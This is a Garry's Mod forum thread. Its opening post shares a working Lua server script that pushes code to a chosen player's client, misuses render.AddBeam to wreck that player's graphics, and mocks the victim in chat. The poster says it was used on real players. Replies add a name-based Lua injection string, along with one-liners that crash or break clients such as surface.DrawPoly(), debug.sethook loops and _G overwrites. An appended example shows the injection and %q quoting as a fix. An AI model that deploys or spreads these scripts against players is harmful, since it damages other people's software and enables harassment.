The render.AddBeam Exploit/Glitch

I’m not sure if this really counts as an exploit; it’s more like a glitch, but here we go anyways.

As you may have heard, the misuse of the **[Render.AddBeam](http://wiki.garrysmod.com/?title=Render.AddBeam)** function can pretty much break map rendering for the client in GMod. Some surfaces won’t render, some render in the wrong places, and everything is a fucked up mess of graphics-rape. Looks to me like GMod took the map and stirred up all the visleaves.

Images:
[img_thumb]http://img52.imageshack.us/img52/2821/gmconstruct0012.jpg[/img_thumb] [img_thumb]http://img69.imageshack.us/img69/3342/gmconstruct0015e.jpg[/img_thumb] [img_thumb]http://img651.imageshack.us/img651/9130/gmconstruct0016.jpg[/img_thumb] [img_thumb]http://img29.imageshack.us/img29/8684/gmconstruct0038l.jpg[/img_thumb] [img_thumb]http://img11.imageshack.us/img11/5558/gmconstruct0050o.jpg[/img_thumb] [img_thumb]http://img532.imageshack.us/img532/8721/gmconstruct0049.jpg[/img_thumb] [img_thumb]http://img63.imageshack.us/img63/6727/gmconstruct0051.jpg[/img_thumb]

I decided that this called for some on-field testing, so I whipped up a little admin console command and gave the script shown below to a friend who was hosting an RP server. His server was constantly being bombarded by minges who were reconnecting with a Steam ID changer, so I figured that it would be perfect testing grounds for something like this.

Results were pretty satisfactory to say the least. One person threatened to DDOS the server, so we used this on him and it totally fried his graphics. He went bat-shit crazy.
[lua]//
// Exploit exploited by Grea$eMonkey and all who decide to make use of this.
// This is a little glitch in the render library that I found.
//
// Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
// The more iterations performed, the more messed up the victim’s graphics will be.
// Be sure you have the steamid/name in quotes, otherwise this won’t work!
//

local consoleStartupMessage = [[
Initializing render.AddBeam exploit script - By Grea$eMonkey
Console Command Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
The more iterations performed, the more messed up the victim’s graphics will be.
Be sure you have the steamid/name in quotes, otherwise this won’t work!
Have fun breaking people’s graphics!
]]

hook.Add(“PlayerInitialSpawn”, “breakClientGraphicsInit”, function(ply)
if ply:IsAdmin() then
Msg(consoleStartupMessage)
end
end)

function BreakClientsGraphics(ply, cmd, args)

if !ply:IsAdmin() then return end

local victim = NULL
local rep = tonumber(args[2])

if !rep or rep == 0 then
	rep = 1
end

for k, v in pairs(player.GetAll()) do
	if v:SteamID() == args[1] then
		victim = v
		print("Victim found by Steam ID: "..tostring(victim))
		break
	end
	if string.find(v:Nick(), args[1]) then
		victim = v
		print("Victim found by Name: "..tostring(victim))
		break
	end
end

if victim:IsValid() and victim:IsPlayer() then
	
	local breakCode1 = [[
		render.StartBeam(100)
			for i = 1, ]]
	local breakCode2 = [[ do
				render.AddBeam(
					nil,
					32,
					CurTime() + 1,
					color_white
				)
			end
		render.EndBeam()
	]]
	
	local noteCode1 = [[
		chat.AddText(
			Color(255,255,255), "Mingebag ",
			Color(255,0,0), "]]
	local noteCode2 = [[",
			Color(255,255,255), " graphics were raped by a ",
			Color(30,30,200), "Server Administrator."
		)
		chat.PlaySound()
	]]
	
	ply:ChatPrint("Sending code to "..victim:Nick().." with a power of "..rep.." repeat"..(rep > 1 and "s").."!")
	
	for k, v in pairs(player.GetAll()) do
		v:SendLua( noteCode1..victim:Nick().."'s"..noteCode2 )
	end
	
	victim:SendLua( breakCode1	.. rep .. breakCode2 )
	
else
	
	ply:ChatPrint("The player you entered was not a valid player")
	
end

end
concommand.Add(“sv_breakclientgraphics”, BreakClientsGraphics)
[/lua]
Notes:
[ul]
[li]This “exploit” is caused by using a nil value for the first argument of Render.AddBeam, which is supposed to be a Vector.[/li]
[li]The more invalid beams you add, the more fucked up the client’s graphics will get. I tried out 100 iterations, and I could barely see anything. GMod crashed shortly after.[/li]
[li]If you disconnect and join any server, your graphics will remain this way. Sometimes restarting GMod doesn’t even fix it.[/li]
[li]Adding -config to your startup supposedly fixes it. You’ll still need to restart GMod though.[/li]
[/ul]
If you want to use this script, just put it in your lua/autorun/server folder and give it a spin. It’s pretty cruel to use on people, but it certainly is an effective tool against persistent mingebags.

Garry, you may want to fix this at some point.

That is very useful and extremely dangerous. I would appreciate it if it’s fixed.

About the script, you could easily inject a string in there via your name.
") RunConsoleCommand(“disconnect”) "

Why make them disconnect?

Overall this is a pointless thread. Someone made something like this before, a script to crash clients, but in the end there are plenty of ways to crash people, and it’s nothing special to release. This script is also vulnerable to the classic lua injection that plagued DarkRP and other scripts a while back. You are putting your server at risk by running this script.
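The Lua injection raised in the posts above, as an added example that is not part of the thread: it contrasts pasting a player name between hand-written quotes, as the script's `SendLua` calls do, with emitting the name through `string.format("%q", ...)`. It runs in stock Lua outside the game; `chat_AddText` and `RunConsoleCommand` are stand-in stubs, `compile`, `build_naive`, `build_quoted` and `run` are hypothetical names, and the hostile name is the string quoted in the thread.

```lua
-- Added example, not from the thread. Runs in stock Lua 5.1-5.4 or LuaJIT.
-- chat_AddText and RunConsoleCommand are stubs standing in for the GMod
-- client functions; all function names here are hypothetical.

-- Compile src so that it can only see the functions in env.
local function compile(src, env)
    if setfenv then                           -- Lua 5.1 / LuaJIT
        local fn, err = loadstring(src)
        if fn then setfenv(fn, env) end
        return fn, err
    end
    return load(src, "generated", "t", env)   -- Lua 5.2 and later
end

-- Vulnerable pattern: the name is pasted between hand-written quotes.
local function build_naive(name)
    return 'chat_AddText("' .. name .. '\'s", " graphics were altered")'
end

-- Hardened pattern: %q emits one complete, escaped string literal.
local function build_quoted(name)
    return string.format('chat_AddText(%q, " graphics were altered")', name .. "'s")
end

-- Execute generated code against the stubs and report what happened.
local function run(src)
    local log = {}
    local env = {
        chat_AddText = function(...) log[#log + 1] = "chat: " .. table.concat({ ... }) end,
        RunConsoleCommand = function(cmd) log[#log + 1] = "console command: " .. tostring(cmd) end,
    }
    local fn, err = compile(src, env)
    if not fn then return "name changed the code structure: " .. err end
    local ok, runtime_err = pcall(fn)
    if not ok then log[#log + 1] = "runtime error: " .. tostring(runtime_err) end
    return table.concat(log, " | ")
end

-- Constructed inputs: an ordinary name and the string quoted in the thread.
local names = { "Bob", '") RunConsoleCommand("disconnect") "' }
for _, name in ipairs(names) do
    print("name:   " .. name)
    print("naive:  " .. run(build_naive(name)))
    print("quoted: " .. run(build_quoted(name)))
end
```

Sending the name to the client as data and keeping the client-side code fixed avoids generating code from player-controlled text at all, so no quoting is needed.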

Also, if you use surface.DrawPoly with nil values. Simply just surface.DrawPoly() and the game will instantly crash with an engine error. I'm so making a ULX plugin for this :V

No need to be a dick about it. The point isn’t to crash. Crashing would defeat the purpose of it, but you’re right. It was mostly just for shits and giggles. The script was just to show the concept of it.

Heh.

We need a Crash/Glitch/Exploit megathread!

Heh, I actually made a plugin for Evolve that did this, along with removing all the variables and such in their environment.

It's really evil, but people think they just had a really bad Lua error or something and rejoin.

Any API that is used incorrectly will have consequences. Add error checking to your code, problem solved. This is almost like saying, well I have a function like InitializeCriticalSection() and passing it NULL. It’s your fault, not the API author.

[lua]while true do debug.sethook() end[/lua]

[lua]cam.End3D()[/lua]

Similar results can be achieved by misusing render.SetClippingPlane and a lot of other functions related to rendering as stated before. This isn’t going to be ‘patched’, you just have to use the functions correctly.

YAY! I’m now officially not the only one anymore!

Besides that exploit was only there for 2 days! haha!
I should add greasemonkey to my friends list: “Lua injection exploit creator friends”

Also, try running this on the client.
[lua]
for _, v in pairs( _G ) do
if ( type( v ) == “function” ) then
v = function() LocalPlayer:PrintMessage( HUD_PRINTTALK, “Dicks” ) end
end
end[/lua]
Or just to completely ruin everything:
[lua]_G = nil[/lua]

Hehehe. I’m just saying for something as small as adding a beam there should be a failsafe operation in the render library.

If I recall correctly, _G is read only regarding that.

Coolfact: _G is simply a reference.

_G is a variable that holds the global environment.

Fixed that.

Am i doin it rite?

http://dl.dropbox.com/u/4838268/rp_city80010.jpg

It's sad that it looks 1000 worse ingame